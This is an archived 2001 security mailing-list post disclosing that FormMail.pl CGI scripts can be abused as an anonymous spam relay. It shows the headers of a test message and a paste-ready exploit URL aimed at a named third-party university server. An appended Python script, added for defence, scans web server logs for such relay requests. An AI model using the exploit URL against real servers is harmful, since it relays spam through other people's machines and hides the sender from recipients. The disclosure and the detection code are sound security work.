From: Michael Rawls (bugtraqSHADOWSTORM.COM)
Date: Sat Mar 10 2001 - 11:43:43 CST


    Hi All,
       I did a little playing with FormMail.pl after a run-in with a spammer
    abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
    used to spam anonymously. I found another server with FormMail.pl and
    tried the same exploit to send myself an email and it worked.

    The email will not show the spammer's real IP. Only the web server's IP
    will show. The web server logs will however show the true IP address of
    the spammer.

    ===========
    Actual example of email sent:
    ============
    Return-Path: <apachehum.auc.dk>
    Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
            by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
            for <spam-lshadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
    Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
            id 14bta3-0004tP-00
            for spam-lshadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
    To: spam-lshadowstorm.com
    From: ()
    Subject: WWW Form Submission
    Message-Id: <E14bta3-0004tP-00hercules.humfak.auc.dk>
    Date: Sun, 11 Mar 2001 01:19:27 +0100
    X-UIDL: TPj"!bg3"!i:T!!=FU"!

    Below is the result of your feedback form. It was submitted by
    () on Sunday, March 11, 2001 at 01:19:27
    ---------------------------------------------------------------------------

    message: Proof that FormMail.pl can be used to send anonymous spam.

    ---------------------------------------------------------------------------

    Paste the line below into your web browser URL box as one long single
    line, insert your email address in place of "emailaddress-to-spam.com",
    and press enter. Now go check your email.

    Begin URL code
    ================
    http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=emailaddress-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam.
    ================

    If this technique was not already in use by a spammer I would have kept it
    to myself, but it has already been used on my server by a spammer.

    The address "www.hum.auc.dk" can be replaced with the address of ANY
    webserver set up to use FormMail.pl.

    -M. Rawls
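The post notes that the web server's own logs still record the spammer's real IP. The following is an added example, not part of the original post or of FormMail.pl, showing how an administrator could scan Apache access log lines for FormMail.pl requests whose `recipient` parameter points outside the domains the form is meant to deliver to; the log lines and the allowed-domain set are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache common log format (not taken from the post).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Mar/2001:01:19:27 +0100] "GET /cgi-bin/FormMail.pl?recipient=victim%40example.net&message=Proof%20that%20FormMail.pl%20can%20be%20used HTTP/1.0" 200 512
198.51.100.7 - - [11/Mar/2001:01:20:02 +0100] "GET /contact.html HTTP/1.0" 200 2048
192.0.2.10 - - [11/Mar/2001:01:21:45 +0100] "POST /cgi-bin/FormMail.pl HTTP/1.0" 200 512
203.0.113.5 - - [11/Mar/2001:02:03:11 +0100] "GET /cgi-bin/FormMail.pl?recipient=webmaster%40hum.auc.dk&message=hello HTTP/1.0" 200 512
"""

# Domains the form is legitimately allowed to deliver to (assumed for this example).
ALLOWED_RECIPIENT_DOMAINS = {"hum.auc.dk"}

# ip, two dashes/identity fields, [timestamp], "METHOD path PROTOCOL", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_formmail_relays(log_text, allowed_domains):
    """Return (client_ip, timestamp, recipient) for every FormMail.pl request
    whose recipient address is outside allowed_domains.

    Only GET requests expose the recipient in the access log; a POST carries
    it in the body, so such lines cannot be judged from the access log alone.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.lower().endswith("/formmail.pl"):
            continue
        # parse_qs URL-decodes the value, so "%40" becomes "@".
        for value in parse_qs(parts.query).get("recipient", []):
            # FormMail accepts a comma-separated recipient list; check each one.
            for rcpt in value.split(","):
                domain = rcpt.strip().rpartition("@")[2].lower()
                if domain not in allowed_domains:
                    hits.append((m.group("ip"), m.group("ts"), rcpt.strip()))
    return hits


if __name__ == "__main__":
    for ip, ts, rcpt in find_formmail_relays(SAMPLE_LOG, ALLOWED_RECIPIENT_DOMAINS):
        print(f"{ts}  {ip} relayed mail to off-domain recipient {rcpt}")
```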